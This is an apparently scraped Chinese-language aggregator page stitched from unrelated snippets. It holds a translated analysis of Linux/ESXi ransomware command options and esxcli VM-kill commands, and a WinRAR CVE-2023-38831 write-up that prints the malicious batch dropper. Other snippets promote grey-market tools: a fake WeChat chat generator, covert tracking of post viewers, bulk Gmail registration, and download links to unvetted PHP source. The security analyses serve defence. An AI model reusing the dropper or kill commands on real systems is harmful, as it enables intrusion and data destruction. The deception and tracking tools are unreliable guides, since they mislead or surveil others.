围观地址：https://weibo.com/2479238731/Ng2WAnGve...

围观地址：https://weibo.com/2479238731/Ng3KS3AAf...

是小美阿,喜欢姐就冲别等姐谈恋爱了再去听反方向的钟#白丝美腿玉足  6p ...

勒索软件领域的演变已经从涉及Windows有效载荷的传统方法，转变为针对其他平台（最明显的是Linux）的方法。在这种转变中，勒索软件运营商正在缩短不同有效载荷发布之间的时间间隔，并在不同的平台上实现功能均等。 通过有策略地利用Conti、Babuk或Lockbit等知名勒索软件家族的代码，勒索软件运营商正在重用和修改代码库，以创建新的攻击技术。随着越来越多的此类事件曝光，安全团队在防御中保持警惕和适应性变得至关重要。 本文将重点介绍最近发现的几个勒索软件家族，它们都在运行后不久就释放了以Linux/ ESXi为重点的有效载荷。了解这些有效载荷的能力是衡量未来风险的重要一步，也是帮助安全团队有效应对的关键。 Linux勒索软件威胁的兴起 回顾四五年前，知名勒索软件运营商重点关注的还是运行Windows的设备。非windows版本的有效负载需要额外的技能和时间来开发和发布。现在的情况却并非如此，像Rust和Go这样的语言允许恶意软件开发人员快速进行多平台移植。 我们今天看到的威胁场景包括勒索软件运营商同时向多个平台释放有效载荷。在这种方法中，通常针对windows的有效负载与针对linux和/或ESXi的有效负载之间不再存在明显的时间间隔。此外，现在跨平台的有效载荷显示功能均等已成为标准。这些以Linux和ESXi为重点的locker包含了其Windows对应版本的所有必要功能。 现代勒索软件运营商也越来越多地重用构建器和代码，或者修改代码库以满足其需求，同时将主要代码作为模型进行维护。安全研究人员指出，这些漏洞的主要来源是Conti、Babuk和LockBit。这些变体能够针对Linux和VMWare ESXi环境，其目的是加密托管在ESXi服务器上的虚拟机（VM），这些虚拟机通常对业务操作和服务至关重要。 通常，攻击者会利用ESXi中的漏洞、弱凭据或其他安全漏洞来访问虚拟化环境。有效地瞄准和加密虚拟机的能力对勒索软件运营商非常有吸引力。通常在几分钟内，完全虚拟化的基础设施就会被正确且强大的有效负载加密和破坏。 MONTI Locker MONTI Locker的历史可以追溯到2022年中期，当时，它曾针对VMware ESXi 服务器发起了多次攻击。 最新版本的MONTI ESXI勒索软件支持各种命令行参数，其中许多是从Conti继承的，MONTI Locker借用了Conti的代码。然而，最近有迹象表明，MONTI Locker背后的运营商正朝着更加定制化的方向发展。 研究人员最近记录了一个样本，该样本似乎摆脱了旧时基于Conti的加密器以及一些命令行参数。这些较新的示例已删除size、log和vmlist参数。 MONTI Locker可用的命令行参数包括： 参数 函数 - path 通往文件/ volumes的路径 -whitelist 要跳过的虚拟机列表（可以接受.txt文件输入） -vmkill 切换虚拟机终止开关 -vmlist 接受虚拟机名称列表（.txt文件） -detach 从屏幕/终端中分离 -log 创建日志文件 -world-id = 针对VMWare内的特定World ID 【2023年8月MONTI Locker帮助屏幕】 同样值得注意的是，MONTI Locker能够在受影响的服务器上更新MOTD文件（每日消息）。例如，这个文件（/etc/motd）控制用户登录到vCenter时看到的内容。感染后，使用MONTI Locker加密的服务器将显示配置的赎金通知。 【MONTI Locker中的MOTD和Index.html引用】 MONTI Locker的总体攻击量低于本文中的其他一些威胁，因为它们的目标往往是有针对性的。而且，就其感染活动的整体生命周期而言，他们十分擅长玩长期游戏。 Akira勒索软件 Akira勒索软件家族的Linux变体自2023年6月以来就已被观察到，但更广泛的操作可追溯到4月份。Akira勒索软件的初始传播是通过利用易受攻击的公开可用的服务和应用程序来实现的。 传统上，Akira勒索软件的有效载荷也是从Conti继承的。Linux版本的Akira勒索软件使用crypto++库来处理设备上的加密。Akira提供了一个简短的命令集，其中不包括任何在加密之前关闭虚拟机的选项。但是，它们确实允许攻击者通过-n参数对加密速度和受害者实际恢复的可能性进行一些控制。该值越大，文件被加密的内容就越多，这意味着速度越慢，受害者在没有适当解密工具的情况下恢复的可能性也越低。 Akira可用的命令行参数包括： 参数 函数 - encryption_path，-p 通往文件/文件夹的路径 -encryption_percent，-n 部分加密，设置要加密文件的百分比 -share_file，-s 加密的共享驱动器路径 –fork 生成用于加密的子进程 【Akira带有加密和路径参数的最小输出】 【Akira命令行参数】 Trigona Linux Locker Trigona是一个于2022年6月首次发现的勒索软件家族。它是一个多重勒索组织，并且拥有一个公开的博客，上面有受害者信息及其被盗数据。他们的恶意软件有效负载已在Windows和Linux上观察到。 在本文讨论的所有家族中，Trigona的原始Windows有效载荷和linux版本的勒索软件之间的发布间隔最长。虽然Trigona的Windows和Linux版本之间的差距最大，但他们丝毫不落后于其他勒索软件家族。 Trigona专注于linux的有效负载是精简且高效的，它们拥有本榜单中最强大的日志记录和测试输出选项。 Trigona的/erase选项在Windows和Linux版本上都可用。这个选项经常被忽视，但安全团队应该意识到，这个选项允许勒索软件作为各种类型的擦除器。使用Trigona有效载荷，/erase选项将完全删除文件，使其基本上不可恢复。这种行为在一定程度上可以通过组合使用/full选项来调整。如果没有后者，则只能用NULL字节覆盖给定文件的前512KB。当与/full参数结合使用时，将覆盖文件的整个内容。受此影响的文件将被赋予. _deleted扩展名，而不是通常的. _locked扩展名。 Trigona可用的命令行参数包括： 参数 函数 /full 实现完全文件加密 /sleep 设置完全执行前等待的秒数 /fast 部分加密 /erase 覆盖数据 /is_testing 设置测试/调试标志 /test_cid 强制使用特定的计算机ID（用于测试和调试） /test_vid 强制使用特定的受害者ID（用于测试和调试） /allow_system 开启系统路径加密功能 /shdwn 加密完成后强制关闭系统 /path 必选-设置要加密的目标路径 /log 指定日志存放路径 【Trigona以/path参数启动】 【Trigona的final log】 【Trigona命令行参数】 Abyss Locker Abyss Locker勒索软件操作于2023年3月出现，并积极针对VMware ESXi环境。Abyss Locker有效负载的初始交付通过各种方式进行，包括网络钓鱼电子邮件或利用易受攻击的公开可用服务和应用程序。 用于Linux的Abyss Locker有效负载源自Babuk代码库，并且以非常相似的方式运行。此外，Abyss中的加密功能是基于HelloKitty勒索软件中的加密功能。目前还不清楚Abyss Locker、HelloKitty和Vice Society之间的正式合作是如何进行的。Abyss Locker包含特定于esxcli命令行工具的调用，该工具用于管理虚拟设备。 【Abyss Locker中的VMware ESXi命令】 Abyss Locker使用esxcli命令行工具，允许多种模式的虚拟机和进程终止。 esxcli vm process list esxcli vm process kill -t=force -w=%d esxcli vm process kill -t=hard -w=%d esxcli vm process kill -t=soft -w=%d 这些命令影响目标虚拟机关闭的“优雅”程度。根据VMware的文档，最省事的选项（soft option）通常是最受欢迎的。硬选项（hard option）执行立即关闭（假设有特权），而强制选项（force option）只能作为最后的手段使用。但如果需要，Abyss将使用任何和所有这些选项。 Abyss Locker可用的命令行参数包括： 参数 函数 -m 部分加密（5-10-20-25-33-50） - v verbose -d 切换到daemon Start <path> 开始加密的路径 -v创建一个详细的“work.log”文件，显示所选择的加密模式和围绕所遇到的每个文件的加密时间的基准。 【Abyss Locker的工作日志文件】 【Abyss Locker命令选项】 就设备加密的速度而言，Abyss Locker的有效载荷是快速且有效的。随着这个群体继续调整他们的有效载荷，我们预计会看到更多的此类威胁活动。 结语 本文研究了几个突出的Linux和VMWare esxi勒索软件家族，深入研究了特定有效负载的用法和命令行语法。通过在可能的情况下突出已理解的谱系，并关注可用的参数，安全团队可以对有效载荷进行实际操作，增强对威胁的检测能力。 使用Windows有效载荷的攻击与针对其他平台的攻击之间的差异表明，勒索软件的格局在不断演变。随着威胁行为者不断重复他们的策略来逃避检测，如何保持领先于这些趋势的能力将变得至关重要。 原文链接： https://www.sentinelone.com/blog/from-conti-to-akira-decoding-the-latest-linux-esxi-ransomware-families/ ...

某个去水印网站大家挺喜欢的，都有好些人问我要源码了，同时很久没见人发去水印网站源码了，于是我决定发出来吧！枓音块手小红书皮皮虾微视等几十种平台去水印网站 PHP 源码，原创作品，转载的时候能否留个原作者！下方是演示图，源码下载链接在最底部 无需配置其它啥，上传解压即可使用！ 网站名称, 站长 QQ，等信息修改 请在 includes/config.php https://suyan8.lanzouj.com/iKawJ16t9rmf ...

源码下载地址：https://wwam.lanzouj.com/idLRY16x7j7e 系统介绍：使用TP6.0框架，支持高并发请求查询，带签到领额度功能，可在线批量查询号码，支持USDT在线充值余额+卡密兑换余额！ 系统演示图： ...

原理就是发一个类似笔记一样的动态，不管对方和你是不是好友，只要通过朋友圈点开了，点开的时间点和次数，以及停留时间就会被统计。 ...

今天给大家揭秘一下外面售卖3980的国外邮箱课程 我们需要用的VPN 国外代理HTTP 谷歌邮箱 以及指纹浏览器 雷电模拟器 以及QQ邮箱 VPN就不过多介绍了 本人只做揭秘也不进行售卖 国外代理的IP会放在另一个文档里面 大家可以注册进行购买 谷歌邮箱的话会进行批量注册的话可以自己进行操作 如果不会批量注册的话也可以找我购买 一个全新的谷歌邮箱是2块钱一个 指纹浏览器放在另一个文档了大家可以自行下载 ...

WinRAR再爆0 day漏洞，已被利用超过4个月。  Winrar是一款免费的主流压缩文件解压软件，支持绝大部分压缩文件格式的解压，全球用户量超过5亿。Group-IB研究人员在分析DarkMe恶意软件时发现WinRAR在处理ZIP文件格式时的一个漏洞，漏洞CVE编号为CVE-2023-38831。攻击者利用该漏洞可以创建欺骗性扩展的诱饵文件来隐藏恶意脚本，即将恶意脚本隐藏在伪装为.jpg、.txt和其他文件格式的压缩文件中，并窃取用户加密货币账户。 研究人员在分析DarkMe恶意软件时发现了一些可疑的ZIP文件。Group-IB在8个加密货币交易的主流论坛上发现了这些恶意ZIP文件，如图1所示： 图1. 交易论坛发布的帖子 CVE-2023-38831漏洞序列图如图2所示： 图2. CVE-2023-38831漏洞序列图 所有压缩文件都是用同一方法创建的，结构相同，包括一个诱饵文件和一个包含恶意文件和未使用文件的文件夹。当用户打开恶意压缩文件后，受害者机会看到一个图像文件和一个相同文件名的文件夹，如图3所示。 图3. 恶意zip文件示例 如果受害者打开伪装为图像的诱饵文件，恶意脚本就会执行攻击的下一阶段，如图4所示： 图4. 攻击流程图 脚本的主要作用是进入攻击的下一阶段，这是通过运行最小化窗口来完成的。然后搜索两个特定文件“Screenshot_05-04-2023.jpg”和 “Images.ico”。JPG文件是受害者打开的图像，“Images.ico”是用来提取和启动新文件的SFX CAB压缩文件。恶意脚本示例如下： @echo off if not DEFINED IS_MINIMIZED   set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit   cd %TEMP%   for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') do     for /F "delims=" %%G in ('dir /b /s "Images.ico"') do       WMIC process call create "%%~G" && "%%~K" && cd %CD% && exit Exit 为了解漏洞工作原理，研究人员创建了2个与发现的恶意压缩文件结构相同的压缩文件。两个文件都包含图像文件，其中一个压缩文件中还包含一个存储脚本的内部文件夹，可以触发消息展示框。然后，研究人员修改了其中一个文件使其与恶意压缩文件一样。然后，比较WinRAR在解压不同压缩文件时的区别。 研究人员主要想确定在打开解压文件时会在%TEMP%/%RARTMPDIR%文件夹中创建什么文件。在原始的zip文件中，只会创建image.jpg文件。在恶意文件zip文件中，其中的文件夹内容也会被提取。 图5. 不同zip文件解压比较 也就是说，攻击发生在WinRAR尝试打开用户想要访问的文件时。ShellExecute函数接收到了打开文件的错误参数。图像文件名与搜索不匹配，引发其被跳过。然后就发现了批处理文件，并执行。 图6 漏洞复现 8月15日该漏洞被分配了CVE编号，但该漏洞从2023年4月开始就被在野利用。研究人员建议WinRAR用户更新到最新的v 6.23版本。 参考及来源：https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/...

小困熊,非得理想型我不行吗#甜妹拍照姿势  6p ...

7uly19,开心每一天#拍照姿势  5p ...

分享四款简洁好看. 自适应的 APP 下载单页源码，采用了底部自动获取 ICP 备案号，还有蓝奏云文件直链解析。不光可以做 APP 下载引导页，也可以随便改下按钮做网站引导页，自由发挥即可！蓝奏云直链解析的好处：APP 放在自己网站服务器里下载老是会报毒 (或 QQ 里老是报毒 APP 链接)，但蓝奏云不会！而且蓝奏云速度快！(接口是远昔自己的，稳定俩年了)这四款单页的优点：自适应手机电脑，简洁好看，文件占用小，简单粗暴！ 效果图如下： ...

彩虹外链网盘，是一款 PHP 网盘与外链分享程序，支持所有格式文件的上传，可以生成文件外链、图片外链、音乐视频外链，生成外链同时自动生成相应的 UBB 代码和 HTML 代码，还可支持文本、图片、音乐、视频在线预览，这不仅仅是一个网盘，更是一个图床亦或是音乐在线试听网站。新版本支持对接阿里云 OSS、腾讯云 COS、华为云 OBS、又拍云、七牛云等云存储，同时增加了图片违规检测功能。   更新记录： V5.5：1. 后台支持批量封禁解封2. 优化后台加载图片速度3. 修复部分云存储下载中文名乱码 V5.4：1. 修复一个高危漏洞（务必更新）2. 修复后台文件搜索等问题 V5.3：1. 新增用户系统，登录用户可保留上传记录2. 默认使用分块上传，解决大文件上传失败问题3. 上传前计算文件 hash，支持极速秒传，新增文件完整性校验4. 云存储支持直接对接接口上传，无需本机中转，上传速度更快5. 云存储支持直接链接下载模式，下载速度更快6. 文件下载新增断点续传功能，视频播放可拖拽7. 新增文件搜索功能8. 增加七牛云存储9. 优化文件预览等页面样式 V5.2：1. 增加又拍云和华为云 OBS 存储2. 修复二维码显示3. 增加上传 API 接口 V5.1：1. 增加腾讯云 COS 存储2. 修复 SAE 兼容性问题3. 修复其他多个问题 V5.0：1. 全新界面，电脑手机自适应2. 视频播放器改用 ckplayer，音乐播放器改用 APlayer3. 全新的文件类型小图标4. 支持开启视频文件人工审核5. 新增阿里云图片违规检测 API6. 所有网站设置均可在后台修改7. 支持自定义本地存储路径8. 新增对接阿里云 OSS 存储 从 5.x 版本升级只需要覆盖除了 config.php 的文件即可 ...

大家好！今天我要向大家介绍一款令人惊叹的工具——微信对话生成器。作为一款聊天记录制作工具，它能够模拟微信聊天，让我们可以轻松制作逼真的聊天对话。 微信对话生成器具有许多强大的功能。首先，它支持添加不同的用户角色进行对话。我们可以自由设定对话的参与者，并为每个角色添加自定义的头像和昵称，使对话更加真实。 其次，微信对话生成器支持发送多种类型的内容，包括文字、语音、图片、红包、转账等。我们可以根据需要添加不同类型的消息，使对话内容更加生动有趣。 通过微信对话生成器，我们可以创造出各种有趣的聊天场景。可以用它制作搞笑的对话截图分享给朋友，或者用于创作有趣的短视频内容。无论是与好友互动，还是制作娱乐内容，微信对话生成器都能为我们带来非凡的创作乐趣。 ...

本程序运行环境PHP5.6  95dg/config.php修改系统数据库 进入数据库绑定 你搭建的域名即可 部署完成 进入数据库 找到data  输入绑定授权域名即可进行授权打开此网站  网站是无对接接口 需要您自行找对接接口即可 也可以联系我这边获取接口 本源码有点乱 有实力的铁铁 可以修改一下哦！ 代挂首页 用户首页 站长后台   ...

围观地址：https://weibo.com/2479238731/NgfVXp0vr...

围观地址：https://weibo.com/2479238731/NgIdBru9K...

围观地址：https://weibo.com/2479238731/NgRDQ3w3g...

围观地址：https://weibo.com/2479238731/NgO7ckpY6...

文章目录 1. 静态变量 2. 静态方法 3. 静态导入语句 4.静态代码块 5. 静态内部类 六、总结 Java中的static关键字可以应用于变量、方法、块、导入和内部类。在本教程中，我们将通过示例来了解在这些地方使用static关键字的效果。 1. 静态变量 要声明变量为静态，请在变量声明中使用static关键字。静态变量语法为： 访问修饰符 static 数据类型 变量名； 例如，Integer类型的公共静态变量就是这样声明的。 public static Integer staticVar; 静态变量最重要的是它们属于类级别。这意味着运行时变量只能有一份副本。 当您在类定义中定义静态变量时，类的每个实例都可以访问该单个副本。类的单独实例不会像非静态变量那样拥有自己的本地副本。 public class JavaStaticExample { public static void main(String[] args) { DataObject objOne = new DataObject(); objOne.staticVar = 10; objOne.nonStaticVar = 20; DataObject objTwo = new DataObject(); System.out.println(objTwo.staticVar); //10 System.out.println(objTwo.nonStaticVar); //null DataObject.staticVar = 30; //Direct Access System.out.println(objOne.staticVar); //30 System.out.println(objTwo.staticVar); //30 }} class DataObject { public static Integer staticVar; public Integer nonStaticVar;}   输出： 10 null 30 30 请注意我们如何将值更改为 30，两个对象现在都看到更新后的值 30。 您应该注意到的另一件事是我们如何能够使用其类名访问静态变量：DataObject.staticVar。我们不需要创建任何实例来访问static变量。它清楚地表明静态变量属于类范围。 2. 静态方法 要声明静态方法，请static在方法声明中使用关键字。静态方法语法为： 访问修饰符 static 返回值类型 方法名； 例如，返回Integer类型的公共静态变量就是这样声明的。 public static Integer staticVar; public static Integer getStaticVar(){ return staticVar;}   以下几个问题需要注意： 您只能访问静态方法内的静态变量。如果尝试访问任何非静态变量，将生成编译器错误，并显示消息“Cannot make a static reference to the non-static field nonStaticVar”。 静态方法可以通过其类引用来访问，并且不需要创建类的实例。尽管您也可以使用实例引用进行访问，但与通过类引用进行访问相比，它没有任何区别。 静态方法也属于类级别范围。 public class JavaStaticExample { public static void main(String[] args) { DataObject.staticVar = 30; //Direct Access Integer value1 = DataObject.getStaticVar(); //access with class reference DataObject objOne = new DataObject(); Integer value2 = objOne.getStaticVar(); //access with instance reference System.out.println(value1); System.out.println(value2); }} class DataObject{public Integer nonStaticVar;public static Integer staticVar; //static variable public static Integer getStaticVar(){ return staticVar; }}   输出： 30 30 3. 静态导入语句 普通的导入声明用于从包中导入类，以便可以在不使用包引用的情况下使用它们。类似地，静态导入声明用于从类中导入静态成员，并允许在不使用类引用的情况下使用它们。 静态导入语句也有两种形式：单个静态导入和静态导入所有成员。单个静态导入声明从一个类型中导入一个静态成员。静态导入所有成员声明导入一个类型的所有静态成员。 //Single-static-import declaration: import static <<package name>>.<<type name>>.<<static member name>>; //Static-import-on-demand declaration: import static <<package name>>.<<type name>>.*;   例如，System.out //Static import statement import static java.lang.System.out; public class JavaStaticExample{public static void main(String[] args){DataObject.staticVar = 30; out.println(DataObject.staticVar); //Static import statement example }}class DataObject{ public static Integer staticVar; //static variable}   输出： 30 4.静态代码块 静态代码块是类初始化代码的一部分，用static关键字包装起来。 public class Main { //static initializer static { System.out.println("Inside static initializer"); } }   当类被加载到内存中时，静态代码块就会被执行。一个类可以有多个静态块，这些静态块将按照它们在类定义中出现的顺序执行。 import static java.lang.System.out; class DataObject{public Integer nonStaticVar;public static Integer staticVar; //static variable //It will be executed firststatic {staticVar = 40;//nonStaticVar = 20; //Not possible to access non-static members} //It will be executed second static { out.println(staticVar); }}   输出： 40 5. 静态内部类 在Java中，你可以将一个类声明为静态内部类。就像其他静态成员一样，嵌套类与类的作用域相关联，因此可以在没有外部类对象的情况下访问内部静态类。 public class JavaStaticExample { public static void main(String[] args) { //Static inner class example System.out.println( DataObject.StaticInnerClas.innerStaticVar ); } } class DataObject { public Integer nonStaticVar; public static Integer staticVar; //static variable static class StaticInnerClas { Integer innerNonStaticVar = 60; static Integer innerStaticVar = 70; //static variable inside inner class }}   请注意，静态内部类无法访问外部类的非静态成员。它只能访问外部类的静态成员。 public class JavaStaticExample { public static void main(String[] args) { //Static inner class example DataObject.StaticInnerClas.accessOuterClass(); } } class DataObject { public Integer nonStaticVar; public static Integer staticVar; //static variable static {staticVar = 40;//nonStaticVar = 20; //Not possible to access non-static members} public static Integer getStaticVar(){return staticVar;} static class StaticInnerClas { public static void accessOuterClass() { System.out.println(DataObject.staticVar); //static variable of outer class System.out.println(DataObject.getStaticVar()); //static method of outer class } }}   输出： 40 六、总结 让我们总结一下Java中关于static关键字的用法 静态成员属于类。无需创建类实例即可访问静态成员。 静态成员（变量和方法）只能在静态方法和静态代码块内访问。 不能在静态方法、静态代码块和静态内部类内部访问非静态成员。 一个类可以有多个静态代码块，它们将按照它们在类定义中出现的顺序执行。 仅当一个类在外部类中声明为内部类时，它才可以是静态的。 静态导入可用于导入类中的所有静态成员。无需任何类引用即可引用这些成员。   ...